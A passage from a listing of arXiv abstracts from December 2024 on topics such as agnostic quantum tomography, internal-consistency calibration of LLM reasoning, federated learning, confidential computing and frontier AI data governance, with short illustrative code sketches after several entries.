We study the task of agnostic tomography: given copies of an unknown $n$-qubit state $\rho$ which has fidelity $\tau$ with some state in a given class $C$, find a state which has fidelity $\ge \tau - \epsilon$ with $\rho$. We give a new framework, stabilizer bootstrapping, for designing computationally efficient protocols for this task, and use this to get new agnostic tomography protocols for the following classes: Stabilizer states: We give a protocol that runs in time $\mathrm{poly}(n,1/\epsilon)\cdot (1/\tau)^{O(\log(1/\tau))}$, answering an open question posed by Grewal, Iyer, Kretschmer, Liang [43] and Anshu and Arunachalam [6]. Previous protocols ran in time $\mathrm{exp}(\Theta(n))$ or required $\tau>\cos^2(\pi/8)$. States with stabilizer dimension $n - t$: We give a protocol that runs in time $n^3\cdot(2^t/\tau)^{O(\log(1/\epsilon))}$, extending recent work on learning quantum states prepared by circuits with few non-Clifford gates, which only applied in the realizable setting where $\tau = 1$ [33, 40, 49, 66]. Discrete product states: If $C = K^{\otimes n}$ for some $\mu$-separated discrete set $K$ of single-qubit states, we give a protocol that runs in time $(n/\mu)^{O((1 + \log (1/\tau))/\mu)}/\epsilon^2$. This strictly generalizes a prior guarantee which applied to stabilizer product states [42]. For stabilizer product states, we give a further improved protocol that runs in time $(n^2/\epsilon^2)\cdot (1/\tau)^{O(\log(1/\tau))}$. As a corollary, we give the first protocol for estimating stabilizer fidelity, a standard measure of magic for quantum states, to error $\epsilon$ in $n^3 \mathrm{quasipoly}(1/\epsilon)$ time.
Updated: 2024-12-05 04:01:48
Domains: quant-ph,cs.CC,cs.DS,cs.LG
Calibrating Reasoning in Language Models with Internal Consistency
Large language models (LLMs) have demonstrated impressive capabilities in various reasoning tasks, aided by techniques like chain-of-thought prompting that elicits verbalized reasoning. However, LLMs often generate text with obvious mistakes and contradictions, raising doubts about their ability to robustly process and utilize generated rationales. In this work, we investigate reasoning in LLMs through the lens of internal representations, focusing on how these representations are influenced by generated rationales. Our preliminary analysis reveals that while generated rationales improve answer accuracy, inconsistencies emerge between the model's internal representations in middle layers and those in final layers, potentially undermining the reliability of their reasoning processes. To address this, we propose internal consistency as a measure of the model's confidence by examining the agreement of latent predictions decoded from intermediate layers. Extensive empirical studies across different models and datasets demonstrate that internal consistency effectively distinguishes between correct and incorrect reasoning paths. Motivated by this, we propose a new approach to calibrate reasoning by up-weighting reasoning paths with high internal consistency, resulting in a significant boost in reasoning performance. Further analysis uncovers distinct patterns in attention and feed-forward modules across layers, providing insights into the emergence of internal inconsistency. In summary, our results demonstrate the potential of using internal representations for self-evaluation of LLMs. Our code is available at github.com/zhxieml/internal-consistency.
Updated: 2024-12-05 04:01:28
Domains: cs.AI,cs.CL
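A rough sketch of one way to score agreement between intermediate-layer latent predictions and the final output, using the familiar logit-lens decoding on GPT-2 as a stand-in model; the paper's exact probing and aggregation may differ.

import torch
from transformers import GPT2LMHeadModel, GPT2TokenizerFast

tok = GPT2TokenizerFast.from_pretrained("gpt2")
model = GPT2LMHeadModel.from_pretrained("gpt2").eval()

ids = tok("The capital of France is", return_tensors="pt").input_ids
with torch.no_grad():
    out = model(ids, output_hidden_states=True)
final_pred = out.logits[0, -1].argmax()

# Decode a latent next-token prediction from every intermediate layer by
# reusing the final layer norm and unembedding (the "logit lens").
votes = []
with torch.no_grad():
    for h in out.hidden_states[1:-1]:
        latent_logits = model.lm_head(model.transformer.ln_f(h[0, -1]))
        votes.append((latent_logits.argmax() == final_pred).item())

internal_consistency = sum(votes) / len(votes)  # fraction of layers that agree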
A Bidirectional Siamese Recurrent Neural Network for Accurate Gait Recognition Using Body Landmarks
Gait recognition is a significant biometric technique for person identification, particularly in scenarios where other physiological biometrics are impractical or ineffective. In this paper, we address the challenges associated with gait recognition and present a novel approach to improve its accuracy and reliability. The proposed method leverages advanced techniques, including sequential gait landmarks obtained through the Mediapipe pose estimation model, Procrustes analysis for alignment, and a Siamese biGRU-dualStack Neural Network architecture for capturing temporal dependencies. Extensive experiments were conducted on large-scale cross-view datasets to demonstrate the effectiveness of the approach, achieving high recognition accuracy compared to other models. The model demonstrated accuracies of 95.7%, 94.44%, 87.71%, and 86.6% on CASIA-B, SZU RGB-D, OU-MVLP, and Gait3D datasets respectively. The results highlight the potential applications of the proposed method in various practical domains, indicating its significant contribution to the field of gait recognition.
Updated: 2024-12-05 03:47:49
Domains: cs.CV,cs.AI,cs.LG
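The Procrustes alignment step is standard and easy to reproduce with scipy; the two synthetic 33-point frames below stand in for Mediapipe pose landmarks seen under different view transforms.

import numpy as np
from scipy.spatial import procrustes

rng = np.random.default_rng(0)
frame_a = rng.random((33, 2))                 # 33 pose landmarks, (x, y)

# A second view of the same pose: rotated, scaled, shifted, lightly perturbed.
theta = np.pi / 8
R = np.array([[np.cos(theta), -np.sin(theta)],
              [np.sin(theta),  np.cos(theta)]])
frame_b = 1.3 * frame_a @ R.T + 0.5 + 0.01 * rng.normal(size=(33, 2))

m1, m2, disparity = procrustes(frame_a, frame_b)
print("disparity after alignment:", disparity)  # near zero: same underlying pose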
FedMetaMed: Federated Meta-Learning for Personalized Medication in Distributed Healthcare Systems
Personalized medication aims to tailor healthcare to individual patient characteristics. However, the heterogeneity of patient data across healthcare systems presents significant challenges to achieving accurate and effective personalized treatments. Ethical concerns further complicate the aggregation of large volumes of data from diverse institutions. Federated Learning (FL) offers a promising decentralized solution by enabling collaborative model training through the exchange of client models rather than raw data, thus preserving privacy. However, existing FL methods often suffer from retrogression during server aggregation, leading to a decline in model performance in real-world medical FL settings. To address data variability in distributed healthcare systems, we introduce Federated Meta-Learning for Personalized Medication (FedMetaMed), which combines federated learning and meta-learning to create models that adapt to diverse patient data across healthcare systems. The FedMetaMed framework aims to produce superior personalized models for individual clients by addressing these limitations. Specifically, we introduce Cumulative Fourier Aggregation (CFA) at the server to improve stability and effectiveness in global knowledge aggregation. CFA achieves this by gradually integrating client models from low to high frequencies. At the client level, we implement a Collaborative Transfer Optimization (CTO) strategy with a three-step process - Retrieve, Reciprocate, and Refine - to enhance the personalized local model through seamless global knowledge transfer. Experiments on real-world medical imaging datasets demonstrate that FedMetaMed outperforms state-of-the-art FL methods, showing superior generalization even on out-of-distribution cohorts.
Updated: 2024-12-05 03:36:55
Domains: cs.AI
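The abstract leaves CFA's exact form open; the sketch below encodes one plausible reading, namely that the server overwrites only a progressively widening low-frequency band of its weights with the client average. Every detail here is an assumption, not the paper's algorithm.

import numpy as np

def cumulative_fourier_agg(server_w, client_ws, frac):
    """Assumed CFA-style step: average clients in the Fourier domain, but only
    overwrite the lowest `frac` of frequencies in the server weights."""
    F_server = np.fft.fft(server_w.ravel())
    F_clients = np.mean([np.fft.fft(w.ravel()) for w in client_ws], axis=0)
    n = F_server.size
    low = np.argsort(np.abs(np.fft.fftfreq(n)))[: max(1, int(frac * n))]
    F_new = F_server.copy()
    F_new[low] = F_clients[low]
    return np.real(np.fft.ifft(F_new)).reshape(server_w.shape)

rng = np.random.default_rng(0)
server = rng.normal(size=(8, 8))
clients = [server + 0.1 * rng.normal(size=(8, 8)) for _ in range(5)]
for frac in (0.1, 0.3, 0.6, 1.0):   # integrate from low to high frequencies
    server = cumulative_fourier_agg(server, clients, frac)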
Maximizing Information Gain in Privacy-Aware Active Learning of Email Anomalies
Redacted emails satisfy most privacy requirements but make it more difficult to detect anomalous emails that may be indicative of data exfiltration. In this paper we develop an enhanced method of Active Learning using an information-gain-maximizing heuristic, and we evaluate its effectiveness in a real-world setting where only redacted versions of email could be labeled by human analysts due to privacy concerns. In the first case study we examined how Active Learning should be carried out. We found that model performance was best when a single highly skilled (in terms of the labelling task) analyst provided the labels. In the second case study we used confidence ratings to estimate the labeling uncertainty of analysts and then prioritized instances for labeling based on the expected information gain (the difference between model uncertainty and analyst uncertainty) that would be provided by labelling each instance. We found that the information gain maximization heuristic improved model performance over existing sampling methods for Active Learning. Based on the results obtained, we recommend that analysts should be screened, and possibly trained, prior to implementation of Active Learning in cybersecurity applications. We also recommend that the information-gain-maximizing sampling method (based on expert confidence) should be used in early stages of Active Learning, provided that well-calibrated confidence can be obtained. We also note that the expertise of analysts should be assessed prior to Active Learning, as we found that analysts with lower labelling skill had poorly calibrated (over-)confidence in their labels.
Updated: 2024-12-05 03:26:16
Domains: cs.HC,cs.CR,cs.LG
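The prioritization heuristic itself is a one-liner: rank instances by model uncertainty minus confidence-derived analyst uncertainty. All probabilities below are fabricated for illustration.

import numpy as np

def entropy(p):
    p = np.clip(p, 1e-12, 1.0)
    return -(p * np.log(p)).sum(axis=-1)

# Model's anomaly probabilities for three redacted emails (illustrative).
model_probs = np.array([[0.50, 0.50],
                        [0.90, 0.10],
                        [0.65, 0.35]])

# Analyst self-reported confidence, turned into a label distribution.
analyst_conf = np.array([0.95, 0.60, 0.90])
analyst_probs = np.stack([analyst_conf, 1.0 - analyst_conf], axis=-1)

# Expected information gain = model uncertainty - analyst uncertainty.
gain = entropy(model_probs) - entropy(analyst_probs)
priority = np.argsort(-gain)   # label the highest-gain instances first
print(gain, priority)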
From Pixels to Insights: A Survey on Automatic Chart Understanding in the Era of Large Foundation Models
Data visualization in the form of charts plays a pivotal role in data analysis, offering critical insights and aiding in informed decision-making. Automatic chart understanding has witnessed significant advancements with the rise of large foundation models in recent years. Foundation models, such as large language models, have revolutionized various natural language processing tasks and are increasingly being applied to chart understanding tasks. This survey paper provides a comprehensive overview of the recent developments, challenges, and future directions in chart understanding within the context of these foundation models. We review fundamental building blocks crucial for studying chart understanding tasks. Additionally, we explore various tasks and their evaluation metrics and sources of both charts and textual inputs. Various modeling strategies are then examined, encompassing both classification-based and generation-based approaches, along with tool augmentation techniques that enhance chart understanding performance. Furthermore, we discuss the state-of-the-art performance of each task and discuss how we can improve the performance. Challenges and future directions are addressed, highlighting the importance of several topics, such as domain-specific charts, lack of efforts in developing evaluation metrics, and agent-oriented settings. This survey paper serves as a comprehensive resource for researchers and practitioners in the fields of natural language processing, computer vision, and data analysis, providing valuable insights and directions for future research in chart understanding leveraging large foundation models. The studies mentioned in this paper, along with emerging new research, will be continually updated at: https://github.com/khuangaf/Awesome-Chart-Understanding.
Updated: 2024-12-05 03:26:13
Domains: cs.CL,cs.AI,cs.CV
HybridGS: Decoupling Transients and Statics with 2D and 3D Gaussian Splatting
Generating high-quality novel view renderings of 3D Gaussian Splatting (3DGS) in scenes featuring transient objects is challenging. We propose a novel hybrid representation, termed HybridGS, using 2D Gaussians for transient objects per image while maintaining traditional 3D Gaussians for the whole static scene. Note that 3DGS itself is better suited for modeling static scenes that assume multi-view consistency, whereas transient objects appear only occasionally and do not adhere to this assumption; we therefore model them as planar objects from a single view, represented with 2D Gaussians. Our novel representation decomposes the scene from the perspective of fundamental viewpoint consistency, making it more reasonable. Additionally, we present a novel multi-view regulated supervision method for 3DGS that leverages information from co-visible regions, further enhancing the distinctions between transients and statics. Then, we propose a straightforward yet effective multi-stage training strategy to ensure robust training and high-quality view synthesis across various settings. Experiments on benchmark datasets show our state-of-the-art performance of novel view synthesis in both indoor and outdoor scenes, even in the presence of distracting elements.
Updated: 2024-12-05 03:20:35
Domains: cs.CV,cs.AI
Linear Causal Representation Learning from Unknown Multi-node Interventions
Despite the multifaceted recent advances in interventional causal representation learning (CRL), they primarily focus on the stylized assumption of single-node interventions. This assumption is not valid in a wide range of applications, and generally, the subset of nodes intervened in an interventional environment is fully unknown. This paper focuses on interventional CRL under unknown multi-node (UMN) interventional environments and establishes the first identifiability results for general latent causal models (parametric or nonparametric) under stochastic interventions (soft or hard) and linear transformation from the latent to observed space. Specifically, it is established that given sufficiently diverse interventional environments, (i) identifiability up to ancestors is possible using only soft interventions, and (ii) perfect identifiability is possible using hard interventions. Remarkably, these guarantees match the best-known results for more restrictive single-node interventions. Furthermore, CRL algorithms are also provided that achieve the identifiability guarantees. A central step in designing these algorithms is establishing the relationships between UMN interventional CRL and score functions associated with the statistical models of different interventional environments. Establishing these relationships also serves as constructive proof of the identifiability guarantees.
Updated: 2024-12-05 03:16:26
Domains: cs.LG,stat.ML
Dynamic Graph Transformer with Correlated Spatial-Temporal Positional Encoding
Learning effective representations for Continuous-Time Dynamic Graphs (CTDGs) has garnered significant research interest, largely due to its powerful capabilities in modeling complex interactions between nodes. A fundamental and crucial requirement for representation learning in CTDGs is the appropriate estimation and preservation of proximity. However, due to the sparse and evolving characteristics of CTDGs, the spatial-temporal properties inherent in high-order proximity remain largely unexplored. Despite its importance, this property presents significant challenges due to the computationally intensive nature of personalized interaction intensity estimation and the dynamic attributes of CTDGs. To this end, we propose a novel Correlated Spatial-Temporal Positional encoding that incorporates a parameter-free personalized interaction intensity estimation under the weak assumption of the Poisson Point Process. Building on this, we introduce the Dynamic Graph Transformer with Correlated Spatial-Temporal Positional Encoding (CorDGT), which efficiently retains the evolving spatial-temporal high-order proximity for effective node representation learning in CTDGs. Extensive experiments on seven small and two large-scale datasets demonstrate the superior performance and scalability of the proposed CorDGT. The code is available at: https://github.com/wangz3066/CorDGT.
Updated: 2024-12-05 03:15:01
Domains: cs.LG
CCxTrust: Confidential Computing Platform Based on TEE and TPM Collaborative Trust
Confidential Computing has emerged to address data security challenges in cloud-centric deployments by protecting data in use through hardware-level isolation. However, reliance on a single hardware root of trust (RoT) limits user confidence in cloud platforms, especially for high-performance AI services, where end-to-end protection of sensitive models and data is critical. Furthermore, the lack of interoperability and a unified trust model in multi-cloud environments prevents the establishment of a cross-platform, cross-cloud chain of trust, creating a significant trust gap for users with high privacy requirements. To address the challenges mentioned above, this paper proposes CCxTrust (Confidential Computing with Trust), a confidential computing platform leveraging collaborative roots of trust from TEE and TPM. CCxTrust combines the black-box RoT embedded in the CPU-TEE with the flexible white-box RoT of TPM to establish a collaborative trust framework. The platform implements independent Roots of Trust for Measurement (RTM) for TEE and TPM, and a collaborative Root of Trust for Report (RTR) for composite attestation. The Root of Trust for Storage (RTS) is solely supported by TPM. We also present the design and implementation of a confidential TPM supporting multiple modes for secure use within confidential virtual machines. Additionally, we propose a composite attestation protocol integrating TEE and TPM to enhance security and attestation efficiency, which is proven secure under the PCL protocol security model. We implemented a prototype of CCxTrust on a confidential computing server with AMD SEV-SNP and TPM chips, requiring minimal modifications to the TPM and guest Linux kernel. The composite attestation efficiency improved by 24% without significant overhead, while Confidential TPM performance showed a 16.47% reduction compared to standard TPM.
Updated: 2024-12-05 03:12:49
Domains: cs.CR,D.4.6; F.4.3
LL-ICM: Image Compression for Low-level Machine Vision via Large Vision-Language Model
Image Compression for Machines (ICM) aims to compress images for machine vision tasks rather than human viewing. Current works predominantly concentrate on high-level tasks like object detection and semantic segmentation. However, the quality of original images is usually not guaranteed in the real world, leading to even worse perceptual quality or downstream task performance after compression. Low-level (LL) machine vision models, like image restoration models, can help improve such quality, and their compression requirements should therefore also be considered. In this paper, we propose a pioneering ICM framework for LL machine vision tasks, namely LL-ICM. By jointly optimizing compression and LL tasks, the proposed LL-ICM not only enriches its encoding ability in generalizing to versatile LL tasks but also optimizes the processing ability of downstream LL task models, achieving mutual adaptation between image codecs and LL task models. Furthermore, we integrate large-scale vision-language models into the LL-ICM framework to generate more universal and distortion-robust feature embeddings for LL vision tasks. Therefore, one LL-ICM codec can generalize to multiple tasks. We establish a solid benchmark to evaluate LL-ICM, which includes extensive objective experiments using both full- and no-reference image quality assessments. Experimental results show that LL-ICM can achieve 22.65% BD-rate reductions over state-of-the-art methods.
Updated: 2024-12-05 03:12:45
Domains: cs.CV,cs.AI
Sinkhorn Algorithm for Sequentially Composed Optimal Transports
The Sinkhorn algorithm is the de facto standard approximation algorithm for optimal transport and has been applied to a variety of applications, including image processing and natural language processing. In theory, its convergence follows from the convergence of the Sinkhorn--Knopp algorithm for the matrix scaling problem, and Altschuler et al. show that its worst-case time complexity is near-linear. Very recently, sequentially composed optimal transports were proposed by Watanabe and Isobe as a hierarchical extension of optimal transports. In this paper, we present an efficient approximation algorithm, namely a Sinkhorn algorithm for sequentially composed optimal transports, based on their entropic regularization. Furthermore, we present a theoretical analysis of this Sinkhorn algorithm, namely (i) its exponential convergence to the optimal solution with respect to the Hilbert pseudometric, and (ii) a worst-case complexity analysis for the case of a single sequential composition.
Updated: 2024-12-05 03:06:08
Domains: cs.DS,cs.LG,cs.NA,math.NA
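For reference, the vanilla Sinkhorn iteration that the paper extends fits in a dozen lines; the sequential-composition variant, which is the paper's contribution, is not reproduced here.

import numpy as np

def sinkhorn(a, b, C, eps=0.1, iters=2000):
    """Entropy-regularized OT plan between histograms a and b with cost C."""
    K = np.exp(-C / eps)
    u, v = np.ones_like(a), np.ones_like(b)
    for _ in range(iters):
        u = a / (K @ v)        # scale rows to match marginal a
        v = b / (K.T @ u)      # scale columns to match marginal b
    return u[:, None] * K * v[None, :]

a = np.full(4, 0.25)
b = np.full(5, 0.20)
C = np.abs(np.arange(4)[:, None] - np.arange(5)[None, :]).astype(float)
P = sinkhorn(a, b, C)
print("row err:", np.abs(P.sum(1) - a).max(), "col err:", np.abs(P.sum(0) - b).max())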
Movie Gen: SWOT Analysis of Meta's Generative AI Foundation Model for Transforming Media Generation, Advertising, and Entertainment Industries
Generative AI is reshaping the media landscape, enabling unprecedented capabilities in video creation, personalization, and scalability. This paper presents a comprehensive SWOT analysis of Meta's Movie Gen, a cutting-edge generative AI foundation model designed to produce 1080p HD videos with synchronized audio from simple text prompts. We explore its strengths, including high-resolution video generation, precise editing, and seamless audio integration, which make it a transformative tool across industries such as filmmaking, advertising, and education. However, the analysis also addresses limitations, such as constraints on video length and potential biases in generated content, which pose challenges for broader adoption. In addition, we examine the evolving regulatory and ethical considerations surrounding generative AI, focusing on issues like content authenticity, cultural representation, and responsible use. Through comparative insights with leading models like DALL-E and Google Imagen, this paper highlights Movie Gen's unique features, such as video personalization and multimodal synthesis, while identifying opportunities for innovation and areas requiring further research. Our findings provide actionable insights for stakeholders, emphasizing both the opportunities and challenges of deploying generative AI in media production. This work aims to guide future advancements in generative AI, ensuring scalability, quality, and ethical integrity in this rapidly evolving field.
Updated: 2024-12-05 03:01:53
Domains: cs.AI,cs.CV
Exploring Kolmogorov-Arnold networks for realistic image sharpness assessment
Score prediction is crucial in evaluating realistic image sharpness based on collected informative features. Recently, Kolmogorov-Arnold networks (KANs) have been developed and have shown remarkable success in data fitting. This study introduces the Taylor series-based KAN (TaylorKAN). We then explore different KANs on four realistic image databases (BID2011, CID2013, CLIVE, and KonIQ-10k), predicting quality scores from 15 mid-level features and 2048 high-level features. Compared to support vector regression, results show that KANs are generally competitive or superior, and TaylorKAN performs best when mid-level features are used. This is the first study to investigate KANs for image quality assessment, shedding light on how to select and further improve KANs in related tasks.
Updated: 2024-12-05 02:59:02
Domains: cs.CV,cs.LG
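The name suggests replacing a KAN's learnable spline edge functions with truncated Taylor expansions; the sketch below makes that assumption explicit and is illustrative rather than the paper's implementation.

import numpy as np

rng = np.random.default_rng(0)

class TaylorEdge:
    """Learnable 1-D edge function phi(x) = sum_k c_k x^k (truncated Taylor series)."""
    def __init__(self, order=4):
        self.c = rng.normal(scale=0.1, size=order + 1)
    def __call__(self, x):
        return sum(ck * x**k for k, ck in enumerate(self.c))

def kan_layer(x, edges):
    """KAN layer: each output sums one learned 1-D function per input coordinate."""
    return np.array([sum(edge(xi) for edge, xi in zip(row, x)) for row in edges])

d_in, d_out = 15, 4                      # e.g., 15 mid-level features in
edges = [[TaylorEdge() for _ in range(d_in)] for _ in range(d_out)]
hidden = kan_layer(rng.normal(size=d_in), edges)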
The Effect of Personalization in FedProx: A Fine-grained Analysis on Statistical Accuracy and Communication Efficiency
FedProx is a simple yet effective federated learning method that enables model personalization via regularization. Despite remarkable success in practice, a rigorous analysis of how such a regularization provably improves the statistical accuracy of each client's local model hasn't been fully established. Setting the regularization strength heuristically presents a risk, as an inappropriate choice may even degrade accuracy. This work fills in the gap by analyzing the effect of regularization on statistical accuracy, thereby providing a theoretical guideline for setting the regularization strength for achieving personalization. We prove that by adaptively choosing the regularization strength under different statistical heterogeneity, FedProx can consistently outperform pure local training and achieve a \textit{minimax-optimal} statistical rate. In addition, to shed light on resource allocation, we design an algorithm, provably showing that stronger personalization reduces communication complexity without increasing the computation cost overhead. Finally, our theory is validated on both synthetic and real-world datasets and its generalizability is verified in a non-convex setting.
Updated: 2024-12-05 02:58:20
Domains: stat.ML,cs.DC,cs.LG,math.ST,stat.CO,stat.TH
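The FedProx local objective is standard: each client minimizes its task loss plus (mu/2)||w - w_global||^2. The sketch below shows one local step; the paper's contribution, choosing the regularization strength mu adaptively under heterogeneity, is not encoded here.

import torch

def fedprox_local_step(model, global_params, batch, loss_fn, opt, mu=0.1):
    """One client update on the FedProx objective: task loss + proximal term."""
    x, y = batch
    task_loss = loss_fn(model(x), y)
    prox = sum(((w - wg) ** 2).sum()
               for w, wg in zip(model.parameters(), global_params))
    opt.zero_grad()
    (task_loss + 0.5 * mu * prox).backward()
    opt.step()

model = torch.nn.Linear(10, 1)
global_params = [p.detach().clone() for p in model.parameters()]  # frozen w_global
batch = (torch.randn(32, 10), torch.randn(32, 1))
fedprox_local_step(model, global_params, batch, torch.nn.functional.mse_loss,
                   torch.optim.SGD(model.parameters(), lr=0.01))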
PEMF-VVTO: Point-Enhanced Video Virtual Try-on via Mask-free Paradigm
Video Virtual Try-on aims to fluently transfer the garment image to a semantically aligned try-on area in the source person video. Previous methods leveraged the inpainting mask to remove the original garment in the source video, thus achieving accurate garment transfer on simple model videos. However, when these methods are applied to realistic video data with more complex scene changes and posture movements, the overly large and incoherent agnostic masks will destroy the essential spatial-temporal information of the original video, thereby inhibiting the fidelity and coherence of the try-on video. To alleviate this problem, we propose a novel point-enhanced mask-free video virtual try-on framework (PEMF-VVTO). Specifically, we first leverage the pre-trained mask-based try-on model to construct large-scale paired training data (pseudo-person samples). Training on these mask-free data enables our model to perceive the original spatial-temporal information while realizing accurate garment transfer. Then, based on the pre-acquired sparse frame-cloth and frame-frame point alignments, we design the point-enhanced spatial attention (PSA) and point-enhanced temporal attention (PTA) to further improve the try-on accuracy and video coherence of the mask-free model. Concretely, PSA explicitly guides the garment transfer to desirable locations through the sparse semantic alignments of video frames and cloth. PTA exploits the temporal attention on sparse point correspondences to enhance the smoothness of generated videos. Extensive qualitative and quantitative experiments clearly illustrate that our PEMF-VVTO can generate more natural and coherent try-on videos than existing state-of-the-art methods.
Updated: 2024-12-05 02:57:24
Domains: cs.CV,cs.AI
Hallo3: Highly Dynamic and Realistic Portrait Image Animation with Diffusion Transformer Networks
Existing methodologies for animating portrait images face significant challenges, particularly in handling non-frontal perspectives, rendering dynamic objects around the portrait, and generating immersive, realistic backgrounds. In this paper, we introduce the first application of a pretrained transformer-based video generative model that demonstrates strong generalization capabilities and generates highly dynamic, realistic videos for portrait animation, effectively addressing these challenges. The adoption of a new video backbone model makes previous U-Net-based methods for identity maintenance, audio conditioning, and video extrapolation inapplicable. To address this limitation, we design an identity reference network consisting of a causal 3D VAE combined with a stacked series of transformer layers, ensuring consistent facial identity across video sequences. Additionally, we investigate various speech audio conditioning and motion frame mechanisms to enable the generation of continuous video driven by speech audio. Our method is validated through experiments on benchmark and newly proposed wild datasets, demonstrating substantial improvements over prior methods in generating realistic portraits characterized by diverse orientations within dynamic and immersive scenes. Further visualizations and the source code are available at: https://fudan-generative-vision.github.io/hallo3/.
Updated: 2024-12-05 02:55:56
Domains: cs.CV,cs.GR,cs.LG
Mechanistic Unlearning: Robust Knowledge Unlearning and Editing via Mechanistic Localization
Methods for knowledge editing and unlearning in large language models seek to edit or remove undesirable knowledge or capabilities without compromising general language modeling performance. This work investigates how mechanistic interpretability -- which, in part, aims to identify model components (circuits) associated to specific interpretable mechanisms that make up a model capability -- can improve the precision and effectiveness of editing and unlearning. We find a stark difference in unlearning and edit robustness when training components localized by different methods. We highlight an important distinction between methods that localize components based primarily on preserving outputs, and those finding high level mechanisms with predictable intermediate states. In particular, localizing edits/unlearning to components associated with the lookup-table mechanism for factual recall 1) leads to more robust edits/unlearning across different input/output formats, and 2) resists attempts to relearn the unwanted information, while also reducing unintended side effects compared to baselines, on both a sports facts dataset and the CounterFact dataset across multiple models. We also find that certain localized edits disrupt the latent knowledge in the model more than any other baselines, making unlearning more robust to various attacks.
Updated: 2024-12-05 02:55:35
Domains: cs.LG,cs.CL
Marginal Causal Flows for Validation and Inference
Investigating the marginal causal effect of an intervention on an outcome from complex data remains challenging due to the inflexibility of employed models and the lack of complexity in causal benchmark datasets, which often fail to reproduce intricate real-world data patterns. In this paper we introduce Frugal Flows, a novel likelihood-based machine learning model that uses normalising flows to flexibly learn the data-generating process, while also directly inferring the marginal causal quantities from observational data. We propose that these models are exceptionally well suited for generating synthetic data to validate causal methods. They can create synthetic datasets that closely resemble the empirical dataset, while automatically and exactly satisfying a user-defined average treatment effect. To our knowledge, Frugal Flows are the first generative model to both learn flexible data representations and also exactly parameterise quantities such as the average treatment effect and the degree of unobserved confounding. We demonstrate the above with experiments on both simulated and real-world datasets.
Updated: 2024-12-05 02:49:36
Domains: cs.LG,cs.AI,stat.ME,stat.ML
A large language model-type architecture for high-dimensional molecular potential energy surfaces
Computing high-dimensional potential surfaces for molecular and materials systems is considered a major challenge in computational chemistry, with potential impact in a range of areas including the fundamental prediction of reaction rates. In this paper we design and discuss an algorithm that has similarities to large language models in generative AI and natural language processing. Specifically, we represent a molecular system as a graph which contains a set of nodes, edges, faces, etc. Interactions between these sets, which represent molecular subsystems in our case, are used to construct the potential energy surface for a reasonably sized chemical system with 51 dimensions. Essentially, a family of neural networks associated with the graph-based subsystems gets the job done for this 51-dimensional system. We then ask whether this same family of lower-dimensional neural networks can be transformed to provide accurate predictions for a 186-dimensional potential surface. We find that our algorithm does provide reasonably accurate results for this larger problem, with sub-kcal/mol accuracy on the higher-dimensional potential surface.
Updated: 2024-12-05 02:48:49
Domains: cs.LG,physics.atm-clus,physics.chem-ph,physics.comp-ph
Residual Hyperbolic Graph Convolution Networks
Hyperbolic graph convolutional networks (HGCNs) have demonstrated representational capabilities of modeling hierarchical-structured graphs. However, as in general GCNs, over-smoothing may occur as the number of model layers increases, limiting the representation capabilities of most current HGCN models. In this paper, we propose residual hyperbolic graph convolutional networks (R-HGCNs) to address the over-smoothing problem. We introduce a hyperbolic residual connection function to overcome the over-smoothing problem, and also theoretically prove the effectiveness of the hyperbolic residual function. Moreover, we use product manifolds and HyperDrop to facilitate the R-HGCNs. The distinctive features of the R-HGCNs are as follows: (1) The hyperbolic residual connection preserves the initial node information in each layer and adds a hyperbolic identity mapping to prevent node features from being indistinguishable. (2) Product manifolds in R-HGCNs have been set up with different origin points in different components to facilitate the extraction of feature information from a wider range of perspectives, which enhances the representing capability of R-HGCNs. (3) HyperDrop adds multiplicative Gaussian noise into hyperbolic representations, such that perturbations can be added to alleviate the over-fitting problem without deconstructing the hyperbolic geometry. Experiment results demonstrate the effectiveness of R-HGCNs under various graph convolution layers and different structures of product manifolds.
Updated: 2024-12-05 02:38:45
Domains: cs.LG
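One natural instantiation of a residual connection in hyperbolic space is Möbius addition on the Poincaré ball, sketched below; whether R-HGCNs use exactly this operator is not stated in the abstract, so treat it as one concrete reading.

import numpy as np

def mobius_add(x, y, c=1.0):
    """Mobius addition on the Poincare ball of curvature -c."""
    xy = 2.0 * c * np.dot(x, y)
    xx = c * np.dot(x, x)
    yy = c * np.dot(y, y)
    num = (1.0 + xy + yy) * x + (1.0 - xx) * y
    den = 1.0 + xy + xx * yy
    return num / den

h_in = np.array([0.10, -0.20])      # node embedding inside the unit ball
update = np.array([0.05, 0.08])     # output of a hyperbolic graph convolution
h_out = mobius_add(h_in, update)    # "residual": initial node info is preserved
assert np.linalg.norm(h_out) < 1.0  # result stays inside the Poincare ball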
Blindfold: Confidential Memory Management by Untrusted Operating System
Confidential Computing (CC) has received increasing attention in recent years as a mechanism to protect user data from untrusted operating systems (OSes). Existing CC solutions hide confidential memory from the OS and/or encrypt it to achieve confidentiality. In doing so, they render OS memory optimization unusable or complicate the trusted computing base (TCB) required for optimization. This paper presents our results toward overcoming these limitations, synthesized in a CC design named Blindfold. Like many other CC solutions, Blindfold relies on a small trusted software component running at a higher privilege level than the kernel, called Guardian. It features three techniques that can enhance existing CC solutions. First, instead of nesting page tables, Guardian mediates how the OS accesses memory and handles exceptions by switching page and interrupt tables. Second, Blindfold employs a lightweight capability system to regulate the kernel semantic access to user memory, unifying case-by-case approaches in previous work. Finally, Blindfold provides carefully designed secure ABI for confidential memory management without encryption. We report an implementation of Blindfold that works on ARMv8-A/Linux. Using Blindfold prototype, we are able to evaluate the cost of enabling confidential memory management by the untrusted Linux kernel. We show Blindfold has a smaller runtime TCB than related systems and enjoys competitive performance. More importantly, we show that the Linux kernel, including all of its memory optimizations except memory compression, can function properly for confidential memory. This requires only about 400 lines of kernel modifications.
Updated: 2024-12-05 02:38:03
Domains: cs.CR,cs.OS
Towards Data Governance of Frontier AI Models
Data is essential to train and fine-tune today's frontier artificial intelligence (AI) models and to develop future ones. To date, academic, legal, and regulatory work has primarily addressed how data can directly harm consumers and creators, such as through privacy breaches, copyright infringements, and bias and discrimination. Our work, instead, focuses on the comparatively neglected question of how data can enable new governance capacities for frontier AI models. This approach for "frontier data governance" opens up new avenues for monitoring and mitigating risks from advanced AI models, particularly as they scale and acquire specific dangerous capabilities. Still, frontier data governance faces challenges that stem from the fundamental properties of data itself: data is non-rival, often non-excludable, easily replicable, and increasingly synthesizable. Despite these inherent difficulties, we propose a set of policy mechanisms targeting key actors along the data supply chain, including data producers, aggregators, model developers, and data vendors. We provide a brief overview of 15 governance mechanisms, of which we centrally introduce five, underexplored policy recommendations. These include developing canary tokens to detect unauthorized use for producers; (automated) data filtering to remove malicious content for pre-training and post-training datasets; mandatory dataset reporting requirements for developers and vendors; improved security for datasets and data generation algorithms; and know-your-customer requirements for vendors. By considering data not just as a source of potential harm, but as a critical governance lever, this work aims to equip policymakers with a new tool for the 